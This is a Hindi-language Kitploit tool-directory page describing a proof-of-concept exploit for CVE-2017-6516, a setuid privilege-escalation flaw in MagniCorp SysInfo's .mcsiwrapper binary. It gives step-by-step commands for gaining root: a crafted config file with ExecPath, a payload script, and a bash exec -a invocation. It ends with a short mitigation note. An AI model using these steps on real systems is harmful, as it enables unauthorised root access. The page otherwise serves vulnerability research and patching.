Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-6516-mcsiwrapper- — CVE-2017-6516 का शोषण करने के लिए एक PoC / कार्यप्रणाली | Kitploit
उपकरण/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

CVE-2017-6516 का शोषण करने के लिए एक PoC / कार्यप्रणाली

रिपॉजिटरी देखें
24 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-6516

CVE-2017-6516 एक विशेषाधिकार वृद्धि भेद्यता है जो MagniCorp SysInfo के .mcsiwrapper बाइनरी को लक्षित करती है जो संस्करण 10-H64 के अंतर्गत है। जब इस बाइनरी पर SUID बिट सेट हो और वह पुराना हो, तो उपयोगकर्ता बाइनरी के स्वामी के रूप में मनमाना कोड निष्पादित कर सकता है - जो अक्सर root होता है।

आवश्यकताएँ

  • बाइनरी .mcsiwrapper में setuid होना चाहिए:
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • बाइनरी .mcsiwrapper संस्करण 10-H64 से नीचे होना चाहिए:
$ .mcsiwrapper --version
<Version under 10-H64>

शोषण

निम्नलिखित सामग्री के साथ एक config फ़ाइल बनाएँ:

ExecPath=<Path to a writeable directory>

ExecPath निर्देशिका में एक पेलोड निष्पादन योग्य फ़ाइल बनाएँ, उदाहरण के लिए:

#!/bin/sh
whoami

और इसे निष्पादन योग्य बनाएँ:

$ chmod +x payload

कमांड चलाएँ:

$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root

शमन

.mcsiwrapper को कम से कम 10-H64 में अपडेट करें।

टूल डाउनलोड करें